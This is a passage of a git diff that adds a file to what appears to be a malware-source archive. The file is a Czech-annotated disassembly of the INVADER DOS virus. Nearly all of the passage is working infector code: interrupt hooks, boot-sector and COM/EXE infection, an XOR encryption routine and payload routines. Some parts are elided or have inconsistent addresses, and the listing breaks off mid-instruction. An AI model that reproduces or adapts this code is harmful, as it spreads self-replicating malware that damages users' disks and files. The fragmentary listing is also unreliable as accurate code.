cr,lf,cr,lf, ' InVircible Registrator Aborted By User!$' +sec_buf: +cseg ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.invdanub.asm b/MSDOS/Virus.MSDOS.Unknown.invdanub.asm new file mode 100644 index 00000000..799c8763 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.invdanub.asm @@ -0,0 +1,1196 @@ +;--------------------------------------------------------------------- +; virus INVADER ziskan 21. 8. 1991 z knihvny (Baran) +; Jedna se o kombinovany virus napadajici BOOT sektor a .COM a .EXE +; soubory. Inspiraci pro EXE cast viru je JERUSALEM B virus. +;--------------------------------------------------------------------- +AX=0000 BX=0000 CX=1064 DX=0000 SP=FFFE BP=0000 SI=0000 DI=0000 +DS=48C5 ES=48C5 SS=48C5 CS=48C5 IP=0100 NV UP EI PL NZ NA PO NC +-10:0100 E92E0B JMP 0C31 + +0000 E9 2E 0B 01 00 F5 54 61-28 99 05 00 00 00 14 17 i....uTa(....... +0010 E0 41 90 19 64 00 C5 48-00 00 03 00 B8 00 50 01 `A..d.EH....8.P. +0020 8F 20 20 20 20 20 20 20-20 20 20 20 20 20 90 19 . .. +0030 20 20 20 20 20 20 20 20-01 00 34 0E 60 61 00 01 ..4.`a.. +0040 20 20 F5 68 50 0D 41 00-00 25 01 00 00 00 00 01 uhP.A..%...... +0050 50 41 43 41 44 2E 45 58-45 43 4F 4D 4D 41 4E 44 PACAD.EXECOMMAND +0060 2E 43 4F 4D 2E 43 4F 4D-2E 45 58 45 10 00 00 02 .COM.COM.EXE.... +0070 00 00 80 00 30 BD 5C 00-30 BD 6C 00 30 BD 62 79 ....0=\.0=l.0=by +0080 20 49 6E 76 61 64 65 72-2C 20 46 65 6E 67 20 43 Invader, Feng C +0090 68 69 61 20 55 2E 2C 20-57 61 72 6E 69 6E 67 3A hia U., Warning: +00A0 20 44 6F 6E 27 74 20 72-75 6E 20 41 43 41 44 2E Don't run ACAD. +00B0 45 58 45 21 D8 0F 8E 0C-90 0A 90 0A 24 00 48 05 EXE!X.......$.H. +00C0 24 00 48 05 24 00 47 06-24 00 47 06 24 00 D8 0F $.H.$.G.$.G.$.X. +00D0 D8 0F 8E 0C 90 0A 90 0A-24 00 48 05 24 00 48 05 X.......$.H.$.H. +00E0 24 00 ED 05 24 00 ED 05-24 00 C1 10 C1 10 1D 0E $.m.$.m.$.A.A... +00F0 69 09 69 09 24 00 B4 04-24 00 B4 04 24 00 ED 05 i.i.$.4.$.4.$.m. +;===================================================================== +; Obsluha preruseni 8H +; +02B3 INT 3 + CMP Byte Ptr CS:[003F],01 + JZ 02DD + PUSH AX + MOV AX,CS:[003A] + CMP CS:[0003],AX + JA 02CD + INC Word Ptr CS:[0003] +02CD PUSH CX + MOV CX,CS:[0003] +02D3 NOP + LOOP 02D3 + POP CX + POP AX +02D8 JMP 0DD5:00AB +02DD INC Word Ptr CS:[0003] + CMP Word Ptr CS:[0003],8000 + JA 02ED + JMP 02D8 +02ED PUSH DS + PUSH AX + PUSH BX + PUSH CS + POP DS + CMP Byte Ptr [0048],01 + JNZ 02FC + JMP 0332 + NOP +02FC MOV BX,[004B] + DEC Byte Ptr [004A] + JNZ 036D + IN AL,61 + AND AL,FE + OUT 61,AL + MOV BX,[004B] + INC Word Ptr [004B] + CMP BX,0096 + JNZ 031D + JMP 0352 + NOP +031D MOV AL,[BX+01E0] + MOV [004A],AL + SHL BX,1 + MOV AX,[BX+00B4] + CMP AX,0000 + JZ 0332 + JMP 033B +0332 IN AL,61 + AND AL,FE + OUT 61,AL + JMP 036D + NOP +033B MOV BX,AX + MOV AL,B6 + OUT 43,AL + MOV AX,BX + OUT 42,AL + MOV AL,AH + OUT 42,AL + IN AL,61 + OR AL,03 + OUT 61,AL + JMP 036D +0352 IN AL,61 + AND AL,FE + OUT 61,AL + MOV Word Ptr [004B],0000 + MOV Byte Ptr [004A],01 + MOV AX,8000 + AND AH,[0005] + MOV [0003],AX +036D POP BX + POP AX + POP DS +0370 JMP 02D8 + +;===================================================================== +; Obsluha preruseni 9H +; +0373 CLI + PUSH AX + PUSH DS + XOR AX,AX + MOV DS,AX + MOV AL,[0417] + POP DS ; rozpoznani CTRL ALT DEL + AND AL,0C + CMP AL,0C ; Je CTRL -ALT + JNZ 03B8 + IN AL,60 + AND AL,7F + CMP AL,53 ; Je DEL + JNZ 03B8 + MOV AX,CS:[0003] + MOV AH,[0049] + MOV CL,05 + CMP Byte Ptr CS:[003F],01 + JNZ 03AB + MOV CL,04 + Word Ptr CS:[0003],8000 + JB 03AB + MOV CL,01 +03AB SHR AH,CL + CMP AL,AH + JA 03B8 +03B1 MOV AL,20 + OUT 20,AL + JMP 03BE +03B8 POP AX +03B9 JMP 0DD5:0125 +03BE PUSH CS + . + . OBSLUHA CTRL ALT DEL + pomocne procedury + . +;========================================================== +; +; +04C1 DB 0 +04C2 DW ? +; +;---------------------------------------------------------- +; Cteni s RESETEM a opakovanim. +; +04C4 MOV Byte Ptr [04C1],00 + MOV [04C2],AX +04CC CALL 04E9 + AND AH,C3 + JZ 04E8 + MOV AH,00 ; RESET + CALL 04E9 ;------------------------------- + MOV AX,[04C2] + INC Byte Ptr [04C1] + CMP Byte Ptr [04C1],01 + JBE 04CC + STC +04E8 RET + +04E9 PUSHF ; Volani puvodni obsluhy + CALL FAR CS:[0634] ; preruseni 13H. + RET + +;===================================================================== +; Obsluha preruseni 13H +; +04F0 80FC02 CMP AH,02 ; operace cteni ? +04F3 751B JNZ 0510 +04F5 F6C280 TEST DL,80 +04F8 751A JNZ 0514 +04FA 80FA02 CMP DL,02 +04FD 7711 JA 0510 +04FF 83F902 CMP CX,+02 ; pro disketu 2 sektor, +0502 750C JNZ 0510 ; 0 stopa +0504 80FE00 CMP DH,00 ; 0 hlava +0507 7507 JNZ 0510 +0509 EB13 JMP 051E +050B 90 NOP + +050C DB 01, 00, 80, 01 + +0510 E92001 JMP 0633 ; KONEC + +513 DB 00 + +0614 80FE01 CMP DH,01 ; pro disk libovolny sektor +0517 75F7 JNZ 0510 ; 1 hlava +0519 80FD00 CMP CH,00 ; 0 stopa +051C 75F2 JNZ 0510 +051E 2E803E130502 CMP Byte Ptr CS:[0513],02 +0524 7407 JZ 052D +0526 2EFE061305 INC Byte Ptr CS:[0513] +052B EBE3 JMP 0510 +052D 2EC606130500 MOV Byte Ptr CS:[0513],00 +0533 2E803E480001 CMP Byte Ptr CS:[0048],01 +0539 74D5 JZ 0510 +053B 50 PUSH AX +053C 53 PUSH BX +053D 51 PUSH CX +053E 52 PUSH DX +053F 56 PUSH SI +0540 57 PUSH DI +0541 06 PUSH ES +0542 1E PUSH DS +0543 8CC8 MOV AX,CS +0545 8ED8 MOV DS,AX +0547 8EC0 MOV ES,AX +0549 88164D00 MOV [004D],DL +054D B400 MOV AH,00 +054F E897FF CALL 04E9 ; RESET ZARIZENI +0552 BB0010 MOV BX,1000 +0555 B80102 MOV AX,0201 +0558 B90100 MOV CX,0001 +055B B600 MOV DH,00 +055D E889FF CALL 04E9 ; NACTI BOOT SEKTOR +0560 7243 JB 05A5 +0562 F6C280 TEST DL,80 +0565 7405 JZ 056C +0567 E8CE00 CALL 0638 ; PRO PEVNY DISK BOOT SEKTOR +056A 7239 JB 05A5 ; AKTIVNI PARTITION +056C B8CB3C MOV AX,3CCB ; Je virus pritomny ? +056F 39473E CMP [BX+3E],AX +0572 7518 JNZ 058C +0574 8B4740 MOV AX,[BX+40] +0577 3DFEFF CMP AX,FFFE +057A 7429 JZ 05A5 +057C 2B4742 SUB AX,[BX+42] +057F 3D0400 CMP AX,0004 +0582 7508 JNZ 058C +0584 E8E300 CALL 066A +0587 7303 JNB 058C +0589 E99F00 JMP 062B +058C F6064D0080 TEST Byte Ptr [004D],80 +0591 7415 JZ 05A8 +0593 C6064F0007 MOV Byte Ptr [004F],07 ; kam ulozit virus +0598 C606500000 MOV Byte Ptr [0050],00 ; u pevneho disku +059D C6064E0000 MOV Byte Ptr [004E],00 +05A2 EB3F JMP 05E3 +05A4 90 NOP +05A5 E98300 JMP 062B +05A8 C6064F0001 MOV Byte Ptr [004F],01 ; kam ulozit virus +05AD C606500028 MOV Byte Ptr [0050],28 ; u diskety +05B2 8A4715 MOV AL,[BX+15] +05B5 3CFC CMP AL,FC +05B7 7305 JNB 05BE +05B9 C606500050 MOV Byte Ptr [0050],50 +05BE A05000 MOV AL,[0050] +05C1 BB8F02 MOV BX,028F +05C4 B90900 MOV CX,0009 +05C7 8807 MOV [BX],AL ; U diskety zaroven +05C9 83C304 ADD BX,+04 ; preformatuj nultou +05CC E2F9 LOOP 05C7 ; stopu. +05CE B80905 MOV AX,0509 +05D1 BB8F02 MOV BX,028F +05D4 C6064E0000 MOV Byte Ptr [004E],00 +05D9 C6064F0001 MOV Byte Ptr [004F],01 +05DE E8AD00 CALL 068E +05E1 7248 JB 062B + +05E3 BB0000 MOV BX,0000 ; Zapis virus. +05E6 A14F00 MOV AX,[004F] +05E9 A3440E MOV [0E44],AX +05EC A14D00 MOV AX,[004D] +05EF A3460E MOV [0E46],AX +05F2 B80903 MOV AX,0309 +05F5 E89600 CALL 068E ;----------------------- +05F8 7231 JB 062B +05FA C6064F0001 MOV Byte Ptr [004F],01 +05FF C606500000 MOV Byte Ptr [0050],00 +0604 F6C280 TEST DL,80 +0607 740C JZ 0615 +0609 A10C05 MOV AX,[050C] +060C A34F00 MOV [004F],AX +060F A10E05 MOV AX,[050E] +0612 A34D00 MOV [004D],AX +0615 BE0310 MOV SI,1003 +0618 BF030E MOV DI,0E03 +061B B92500 MOV CX,0025 +061E 90 NOP +061F FC CLD +0620 F3A4 REPZ MOVSB +0622 BB000E MOV BX,0E00 ; Zapis virus do BOOT sektoru. +0625 B80103 MOV AX,0301 +0628 E86300 CALL 068E +062B 1F POP DS +062C 07 POP ES +062D 5F POP DI +062E 5E POP SI +062F 5A POP DX +0630 59 POP CX +0631 5B POP BX +0632 58 POP AX +0633 EA88227000 JMP 0070:2288 + +;------------------------------------------------------------------ +; Pro pevny disk nalezeni aktivni PARTITION a nacteni BOOT sektoru. +; +0638 MOV SI,11BE + MOV BL,04 +063D CMP Byte Ptr [SI],80 + JZ 0650 + CMP Byte Ptr [SI],00 + JNZ 064E + ADD SI,+10 + DEC BL + JNZ 063D +064E STC + RET +0650 MOV AX,[SI] + MOV [050E],AX + MOV AX,[SI+02] + MOV [050C],AX + MOV DX,[SI] + MOV CX,[SI+02] + MOV AX,0201 + MOV BX,1000 + CALL 04C4 + RET + +066A 8B4740 MOV AX,[BX+40] +066D 33D2 XOR DX,DX +066F F77718 DIV Word Ptr [BX+18] +0672 FEC2 INC DL +0674 88164F00 MOV [004F],DL +0678 33D2 XOR DX,DX +067A F7771A DIV Word Ptr [BX+1A] +067D 88164E00 MOV [004E],DL +0681 A25000 MOV [0050],AL +0684 B80102 MOV AX,0201 +0687 BB0010 MOV BX,1000 +068A E80100 CALL 068E +068D C3 RET + +068E 8B0E4F00 MOV CX,[004F] +0692 8B164D00 MOV DX,[004D] +0696 E82BFE CALL 04C4 +0699 C3 RET + +;===================================================================== +; Obsluha preruseni 21H +; +069A 9C PUSHF +069B 3D4342 CMP AX,4243 ; test pritommnosti viru +069E 7505 JNZ 06A5 +06A0 B87856 MOV AX,5678 +06A3 9D POPF +06A4 CF IRET +06A5 3D4442 CMP AX,4244 +06A8 741F JZ 06C9 +06AA 3D004B CMP AX,4B00 ; EXEC +06AD 7503 JNZ 06B2 +06AF EB2E JMP 06DF +06B1 90 NOP +06B2 3D003D CMP AX,3D00 +06B5 750B JNZ 06C2 +06B7 2E803E3E0001 CMP Byte Ptr [003E],01 +06BD 7403 JZ 06C2 +06BF EB1E JMP 06DF +06C2 CC INT 3 +06C3 9D POPF +06C4 EA14021C10 JMP 101C:0214 +06C9 58 POP AX +06CA 58 POP AX +06CB 58 POP AX +06CC 2EA3DD06 MOV CS:[06DD],AX +06D0 F3A4 REPZ MOVSB +06D2 9D POPF +06D3 E87703 CALL 0A4D +06D6 8B0E1400 MOV CX,[0014] +06DA EA0001EE13 JMP 13EE:0100 +;==================================================================== +; obsluha sluzby EXEC +; +06DF 2EC7060A00FFFF MOV Word Ptr CS:[000A],FFFF +06E6 2EC70638000000 MOV Word Ptr CS:[0038],0000 +06ED 2E89160600 MOV CS:[0006],DX +06F2 2E8C1E0800 MOV CS:[0008],DS +06F7 50 PUSH AX +06F8 53 PUSH BX +06F9 51 PUSH CX +06FA 52 PUSH DX +06FB 56 PUSH SI +06FC 57 PUSH DI +06FD 1E PUSH DS +06FE 06 PUSH ES +06FF FC CLD +0700 8BF2 MOV SI,DX +0702 8A04 MOV AL,[SI] ; konverze jmena na velka +0704 0AC0 OR AL,AL ; pismena. +0706 740E JZ 0716 +0708 3C61 CMP AL,61 ;'a' +070A 7207 JB 0713 +070C 3C7A CMP AL,7A ;'z' +070E 7703 JA 0713 +0710 802C20 SUB Byte Ptr [SI],20 ;' ' +0713 46 INC SI +0714 EBEC JMP 0702 +0716 2E89363C00 MOV CS:[003C],SI ; ukazatel za jmeno +071B 8BC6 MOV AX,SI +071D 0E PUSH CS +071E 07 POP ES +071F B90B00 MOV CX,000B +0722 2BF1 SUB SI,CX +0724 BF5900 MOV DI,0059 ; nenapadame COMMAND.COM +0727 F3A6 REPZ CMPSB +0729 7503 JNZ 072E +072B E9EA02 JMP 0A18 +072E 8BF0 MOV SI,AX +0730 B90800 MOV CX,0008 +0733 2BF1 SUB SI,CX +0735 BF5100 MOV DI,0051 +0738 F3A6 REPZ CMPSB ; a ACAD.EXE +073A 751F JNZ 075B +073C E81903 CALL 0A58 +073F 2E803E3F0001 CMP Byte Ptr CS:[003F],01 +0745 7409 JZ 0750 +0747 2E83063A001E ADD Word Ptr CS:[003A],+1E +074D EB08 JMP 0757 +074F 90 NOP +0750 2E810603000004 ADD Word Ptr CS:[0003],0400 +0757 F9 STC +0758 EB0D JMP 0767 +075A 90 NOP +075B B80043 MOV AX,4300 ; atributy souboru +075E CD21 INT 21 ;---------------------- +0760 7205 JB 0767 +0762 2E890E0C00 MOV CS:[000C],CX +0767 726F JB 07D8 +0769 32C0 XOR AL,AL +076B 2EA21B00 MOV CS:[001B],AL +076F 2E8B363C00 MOV SI,CS:[003C] +0774 B90400 MOV CX,0004 +0777 2BF1 SUB SI,CX +0779 BF6400 MOV DI,0064 ; porovname s .COM +077C F3A6 REPZ CMPSB +077E 741A JZ 079A +0780 2EFE061B00 INC Byte Ptr CS:[001B] +0785 2E8B363C00 MOV SI,CS:[003C] +078A B90400 MOV CX,0004 +078D 2BF1 SUB SI,CX +078F BF6800 MOV DI,0068 +0792 F3A6 REPZ CMPSB ; a .EXE +0794 7404 JZ 079A +0796 F9 STC +0797 EB3F JMP 07D8 +0799 90 NOP +079A 8BFA MOV DI,DX +079C 32D2 XOR DL,DL +079E 807D013A CMP Byte Ptr [DI+01],3A ;':' +07A2 7505 JNZ 07A9 +07A4 8A15 MOV DL,[DI] +07A6 80E21F AND DL,1F +07A9 B436 MOV AH,36 ; Zjisti volny prostor +07AB CD21 INT 21 ; na disku. +07AD 3DFFFF CMP AX,FFFF ; +07B0 7503 JNZ 07B5 ; +07B2 E96302 JMP 0A18 ; +07B5 F7E3 MUL BX ; +07B7 F7E1 MUL CX ; +07B9 0BD2 OR DX,DX ; +07BB 7505 JNZ 07C2 ; +07BD 3D0010 CMP AX,1000 ; +07C0 72F0 JB 07B2 ;---------------------- +07C2 2E8B160600 MOV DX,CS:[0006] +07C7 B8003D MOV AX,3D00 ; otevri soubor +07CA 2EC6063E0001 MOV Byte Ptr CS:[003E],01 +07D0 CD21 INT 21 +07D2 2EC6063E0000 MOV Byte Ptr CS:[003E],00 +07D8 7267 JB 0841 +07DA 2EA30A00 MOV CS:[000A],AX +07DE 8BD8 MOV BX,AX +07E0 B80242 MOV AX,4202 ; SEEK na konec - 5 +07E3 B9FFFF MOV CX,FFFF +07E6 BAFBFF MOV DX,FFFB +07E9 CD21 INT 21 +07EB 7254 JB 0841 +07ED 050500 ADD AX,0005 +07F0 2EA31400 MOV CS:[0014],AX +07F4 B80042 MOV AX,4200 +07F7 B90000 MOV CX,0000 ; SEEK na zacatek + 12 +07FA BA1200 MOV DX,0012 +07FD CD21 INT 21 +07FF 7240 JB 0841 +0801 B90200 MOV CX,0002 +0804 BA3600 MOV DX,0036 +0807 8BFA MOV DI,DX +0809 8CC8 MOV AX,CS +080B 8ED8 MOV DS,AX +080D 8EC0 MOV ES,AX +080F B43F MOV AH,3F ; precteme 2 byte +0811 CD21 INT 21 +0813 8B05 MOV AX,[DI] +0815 3D9019 CMP AX,1990 ; Pokud jsou 1990, koncime. +0818 7507 JNZ 0821 +081A B43E MOV AH,3E +081C CD21 INT 21 +081E E9F701 JMP 0A18 +0821 B82435 MOV AX,3524 ; redefinice preruseni 24H +0824 CD21 INT 21 +0826 891E230A MOV [0A23],BX +082A 8C06250A MOV [0A25],ES +082E BA270A MOV DX,0A27 +0831 B82425 MOV AX,2524 +0834 CD21 INT 21 ;-------------------------- +0836 C5160600 LDS DX,[0006] +083A 33C9 XOR CX,CX +083C B80143 MOV AX,4301 ; nastav atributy +083F CD21 INT 21 +0841 723B JB 087E +0843 2E8B1E0A00 MOV BX,CS:[000A] +0848 B43E MOV AH,3E ; zavri soubor +084A CD21 INT 21 +084C 2EC7060A00FFFF MOV Word Ptr CS:[000A],FFFF +0853 B8023D MOV AX,3D02 ; otevri v R/W modu +0856 CD21 INT 21 +0858 7224 JB 087E +085A 2EA30A00 MOV CS:[000A],AX +085E 8CC8 MOV AX,CS +0860 8ED8 MOV DS,AX +0862 8EC0 MOV ES,AX +0864 8B1E0A00 MOV BX,[000A] +0868 B80057 MOV AX,5700 ; datum posledni modifikace +086B CD21 INT 21 +086D 89160E00 MOV [000E],DX +0871 890E1000 MOV [0010],CX +0875 B80042 MOV AX,4200 ; seek na zacatek +0878 33C9 XOR CX,CX +087A 8BD1 MOV DX,CX +087C CD21 INT 21 +087E 7255 JB 08D5 +0880 803E1B0000 CMP Byte Ptr [001B],00 +0885 7403 JZ 088A +0887 EB6B JMP 08F4 + +;--------------------------------------------------------------- +; OBSLUHA .COM souboru. +; +088A BB0010 MOV BX,1000 +088D B448 MOV AH,48 +088F CD21 INT 21 +0891 730B JNB 089E +0893 B43E MOV AH,3E +0895 8B1E0A00 MOV BX,[000A] +0899 CD21 INT 21 +089B E97A01 JMP 0A18 +089E FF063800 INC Word Ptr [0038] +08A2 8EC0 MOV ES,AX +08A4 33F6 XOR SI,SI +08A6 8BFE MOV DI,SI +08A8 A10300 MOV AX,[0003] +08AB 0C01 OR AL,01 +08AD A20500 MOV [0005],AL +08B0 C606480001 MOV Byte Ptr [0048],01 +08B5 E87201 CALL 0A2A +08B8 B90010 MOV CX,1000 +08BB F3A4 REPZ MOVSB +08BD E86A01 CALL 0A2A +08C0 C606480000 MOV Byte Ptr [0048],00 +08C5 8BD7 MOV DX,DI +08C7 8B0E1400 MOV CX,[0014] +08CB 8B1E0A00 MOV BX,[000A] +08CF 06 PUSH ES +08D0 1F POP DS +08D1 B43F MOV AH,3F +08D3 CD21 INT 21 +08D5 7215 JB 08EC +08D7 03F9 ADD DI,CX +08D9 7211 JB 08EC +08DB 33C9 XOR CX,CX +08DD 8BD1 MOV DX,CX +08DF B80042 MOV AX,4200 +08E2 CD21 INT 21 +08E4 8BCF MOV CX,DI +08E6 33D2 XOR DX,DX +08E8 B440 MOV AH,40 +08EA CD21 INT 21 +08EC 7210 JB 08FE +08EE E86701 CALL 0A58 +08F1 E9DF00 JMP 09D3 + +;--------------------------------------------------------------- +; OBSLUHA .EXE souboru. +; +08F4 B91C00 MOV CX,001C ; nacteni .EXE headeru +08F7 BA1C00 MOV DX,001C +08FA B43F MOV AH,3F +08FC CD21 INT 21 +08FE 7252 JB 0952 +0900 813E2E009019 CMP Word Ptr [002E],1990 ; kontrolni suma +0906 744A JZ 0952 +0908 C7062E009019 MOV Word Ptr [002E],1990 +090E A12A00 MOV AX,[002A] ; SS +0911 A34200 MOV [0042],AX +0914 A12C00 MOV AX,[002C] ; SP +0917 A34000 MOV [0040],AX +091A A13000 MOV AX,[0030] ; IP +091D A3A60B MOV [0BA6],AX +0920 A13200 MOV AX,[0032] ; CS +0923 A3A80B MOV [0BA8],AX +0926 A12000 MOV AX,[0020] ; pocet bloku +0929 833E1E0000 CMP Word Ptr [001E],+00 +092E 7401 JZ 0931 +0930 48 DEC AX +0931 F7266E00 MUL Word Ptr [006E] +0935 03061E00 ADD AX,[001E] ; byte v poslednim bloku +0939 83D200 ADC DX,+00 +093C 050F00 ADD AX,000F +093F 83D200 ADC DX,+00 +0942 25F0FF AND AX,FFF0 +0945 A34400 MOV [0044],AX +0948 89164600 MOV [0046],DX +094C 050010 ADD AX,1000 +094F 83D200 ADC DX,+00 +0952 723A JB 098E +0954 F7366E00 DIV Word Ptr [006E] +0958 0BD2 OR DX,DX +095A 7401 JZ 095D +095C 40 INC AX +095D A32000 MOV [0020],AX +0960 89161E00 MOV [001E],DX +0964 A14400 MOV AX,[0044] +0967 8B164600 MOV DX,[0046] +096B F7366C00 DIV Word Ptr [006C] +096F 2B062400 SUB AX,[0024] +0973 A33200 MOV [0032],AX +0976 C7063000630B MOV Word Ptr [0030],0B63 +097C A32A00 MOV [002A],AX +097F C7062C00FE0D MOV Word Ptr [002C],0DFE +0985 33C9 XOR CX,CX +0987 8BD1 MOV DX,CX +0989 B80042 MOV AX,4200 +098C CD21 INT 21 +098E 720A JB 099A +0990 B91C00 MOV CX,001C +0993 BA1C00 MOV DX,001C +0996 B440 MOV AH,40 +0998 CD21 INT 21 +099A 7211 JB 09AD +099C 3BC1 CMP AX,CX +099E 7533 JNZ 09D3 +09A0 8B164400 MOV DX,[0044] +09A4 8B0E4600 MOV CX,[0046] +09A8 B80042 MOV AX,4200 +09AB CD21 INT 21 +09AD 7224 JB 09D3 +09AF A10300 MOV AX,[0003] +09B2 0C01 OR AL,01 +09B4 A20500 MOV [0005],AL +09B7 C606480001 MOV Byte Ptr [0048],01 +09BC E86B00 CALL 0A2A +09BF 33D2 XOR DX,DX +09C1 B90010 MOV CX,1000 +09C4 B440 MOV AH,40 +09C6 CD21 INT 21 +09C8 E85F00 CALL 0A2A +09CB C606480000 MOV Byte Ptr [0048],00 +09D0 E88500 CALL 0A58 +09D3 2E833E380000 CMP Word Ptr CS:[0038],+00 +09D9 7404 JZ 09DF +09DB B449 MOV AH,49 +09DD CD21 INT 21 +09DF 2E833E0A00FF CMP Word Ptr CS:[000A],-01 +09E5 7431 JZ 0A18 +09E7 2E8B1E0A00 MOV BX,CS:[000A] +09EC 2E8B160E00 MOV DX,CS:[000E] +09F1 2E8B0E1000 MOV CX,CS:[0010] +09F6 B80157 MOV AX,5701 +09F9 CD21 INT 21 +09FB B43E MOV AH,3E +09FD CD21 INT 21 +09FF 2EC5160600 LDS DX,CS:[0006] +0A04 2E8B0E0C00 MOV CX,CS:[000C] +0A09 B80143 MOV AX,4301 +0A0C CD21 INT 21 +0A0E 2EC516230A LDS DX,CS:[0A23] +0A13 B82425 MOV AX,2524 +0A16 CD21 INT 21 +0A18 07 POP ES +0A19 1F POP DS +0A1A 5F POP DI +0A1B 5E POP SI +0A1C 5A POP DX +0A1D 59 POP CX +0A1E 5B POP BX +0A1F 58 POP AX +0A20 E99FFC JMP 06C2 + +0A23 BF0563 MOV DI,6305 +0A26 16 PUSH SS + +;=============================================================== +; Obsluha preruseni 24H +; +0A27 32C0 XOR AL,AL +0A29 CF IRET + +;===================================================================== +; KODOVACI PROCEDURA kodujeme od 51H o delce 262H. +; +0A2A 1E PUSH DS +0A2B 06 PUSH ES +0A2C 57 PUSH DI +0A2D 56 PUSH SI +0A2E 51 PUSH CX +0A2F 50 PUSH AX +0A30 0E PUSH CS +0A31 07 POP ES +0A32 0E PUSH CS +0A33 1F POP DS +0A34 BE5100 MOV SI,0051 +0A37 8BFE MOV DI,SI +0A39 B96202 MOV CX,0262 +0A3C 8A260500 MOV AH,[0005] +0A40 AC LODSB +0A41 32C4 XOR AL,AH +0A43 AA STOSB +0A44 E2FA LOOP 0A40 +0A46 58 POP AX +0A47 59 POP CX +0A48 5E POP SI +0A49 5F POP DI +0A4A 07 POP ES +0A4B 1F POP DS +0A4C C3 RET + +0A4D 33C0 XOR AX,AX +0A4F 8BD8 MOV BX,AX +0A51 8BD0 MOV DX,AX +0A53 8BF0 MOV SI,AX +0A55 8BF8 MOV DI,AX +0A57 C3 RET + +0A58 2EFE064900 INC Byte Ptr CS:[0049] +0A5D C3 RET + +0A5E 1E PUSH DS +0A5F 0E PUSH CS +0A60 1F POP DS +0A61 B400 MOV AH,00 +0A63 CD1A INT 1A +0A65 8BDA MOV BX,DX +0A67 CD1A INT 1A +0A69 3BDA CMP BX,DX +0A6B 74FA JZ 0A67 +0A6D 33F6 XOR SI,SI +0A6F 8BDA MOV BX,DX +0A71 CD1A INT 1A +0A73 46 INC SI +0A74 3BDA CMP BX,DX +0A76 74F9 JZ 0A71 +0A78 8BDE MOV BX,SI +0A7A D1E3 SHL BX,1 +0A7C 891E3A00 MOV [003A],BX +0A80 C6063F0000 MOV Byte Ptr [003F],00 +0A85 C606480000 MOV Byte Ptr [0048],00 +0A8A E440 IN AL,40 +0A8C 8AE0 MOV AH,AL +0A8E E440 IN AL,40 +0A90 8AC4 MOV AL,AH +0A92 2E32060500 XOR AL,CS:[0005] +0A97 3C1F CMP AL,1F +0A99 7705 JA 0AA0 +0A9B C6063F0001 MOV Byte Ptr [003F],01 +0AA0 C70603000100 MOV Word Ptr [0003],0001 +0AA6 C7064B000000 MOV Word Ptr [004B],0000 +0AAC C6064A0001 MOV Byte Ptr [004A],01 +0AB1 C6063E0000 MOV Byte Ptr [003E],00 +0AB6 C606730F00 MOV Byte Ptr [0F73],00 +0ABB 90 NOP +0ABC 1F POP DS +0ABD C3 RET + +;===================================================================== +; +; +-10:0BBE 1E PUSH DS +-10:0BBF 06 PUSH ES +-10:0BC0 33C0 XOR AX,AX +-10:0BC2 8ED8 MOV DS,AX +-10:0BC4 A11304 MOV AX,[0413] ; velikost pammeti v KB +-10:0BC7 B106 MOV CL,06 ; prepocet na paragrafy +-10:0BC9 D3E0 SHL AX,CL +-10:0BCB 8ED8 MOV DS,AX +-10:0BCD 33F6 XOR SI,SI ; Na konci pameti hledame +-10:0BCF 8B443E MOV AX,[SI+3E] ; zda je virus pritommny. +-10:0BD2 3DCB3C CMP AX,3CCB +-10:0BD5 7434 JZ 0C0B ; +-10:0BD7 833E400EFE CMP Word Ptr [0E40],-02 +-10:0BDC 7403 JZ 0BE1 +-10:0BDE EB4E JMP 0C2E +-10:0BE0 90 NOP +-10:0BE1 FA CLI +-10:0BE2 B3FF MOV BL,FF +-10:0BE4 B84342 MOV AX,4243 +-10:0BE7 CD21 INT 21 +-10:0BE9 3D7856 CMP AX,5678 +-10:0BEC 741A JZ 0C08 +-10:0BEE C606740F01 MOV Byte Ptr [0F74],01 +-10:0BF3 90 NOP +-10:0BF4 FB STI +-10:0BF5 B82135 MOV AX,3521 +-10:0BF8 CD21 INT 21 +-10:0BFA 891EC506 MOV [06C5],BX +-10:0BFE 8C06C706 MOV [06C7],ES +-10:0C02 BA9A06 MOV DX,069A +-10:0C05 B82125 MOV AX,2521 +-10:0C08 EB24 JMP 0C2E +-10:0C0A 90 NOP +-10:0C0B C7443EFEFF MOV Word Ptr [SI+3E],FFFE +-10:0C10 33C0 XOR AX,AX +-10:0C12 8ED8 MOV DS,AX +-10:0C14 8EC0 MOV ES,AX +-10:0C16 BE0402 MOV SI,0204 +-10:0C19 BF2000 MOV DI,0020 +-10:0C1C B90200 MOV CX,0002 +-10:0C1F FA CLI +-10:0C20 F3 A5 REPZ MOVSW +-10:0C22 FB STI +-10:0C23 BE0C02 MOV SI,020C +-10:0C26 BF4C00 MOV DI,004C +-10:0C29 B90200 MOV CX,0002 +-10:0C2C F3 A5 REPZ MOVSW +-10:0C2E 07 POP ES +-10:0C2F 1F POP DS +-10:0C30 C3 RET + +;--------------------------------------------------------------------- +; pocatek viru pro COM +; +-10:0C31 E88AFF CALL 0BBE +-10:0C34 B3FF MOV BL,FF +-10:0C36 B84342 MOV AX,4243 +-10:0C39 CD21 INT 21 +-10:0C3B 3D7856 CMP AX,5678 +-10:0C3E 7513 JNZ 0C53 +-10:0C40 B84442 MOV AX,4244 +-10:0C43 BF0001 MOV DI,0100 +-10:0C46 2E8B8D1400 MOV CX,CS:[DI+0014] +-10:0C4B BE0010 MOV SI,1000 +-10:0C4E 03F7 ADD SI,DI +-10:0C50 FC CLD +-10:0C51 CD21 INT 21 +-10:0C53 8CCB MOV BX,CS +-10:0C55 83C310 ADD BX,+10 +-10:0C58 8ED3 MOV SS,BX +-10:0C5A BCEE0D MOV SP,0DEE +-10:0C5D 53 PUSH BX +-10:0C5E BB630B MOV BX,0B63 +-10:0C61 53 PUSH BX +-10:0C62 CB RETF + +;--------------------------------------------------------------------- +; ZDE POKRACUJEME PO RETF (C62) + pocatek pro EXE +; +AX=0006 BX=0B63 CX=1006 DX=0000 SP=0DEE BP=0000 SI=0000 DI=0000 +DS=48C5 ES=48C5 SS=CS CS=CS IP=0B63 NV UP EI PL NZ NA PO NC + +0B63 FC CLD +0B64 06 PUSH ES +0B65 E856FF CALL 0ABE (procedura BBE) +0B68 2E8C061600 MOV CS:[0016],ES +0B6D 2E8C067400 MOV CS:[0074],ES +0B72 2E8C067800 MOV CS:[0078],ES +0B77 2E8C067C00 MOV CS:[007C],ES +0B7C 8CC3 MOV BX,ES +0B7E 83C310 ADD BX,+10 +0B81 2E011EA80B ADD CS:[0BA8],BX +0B86 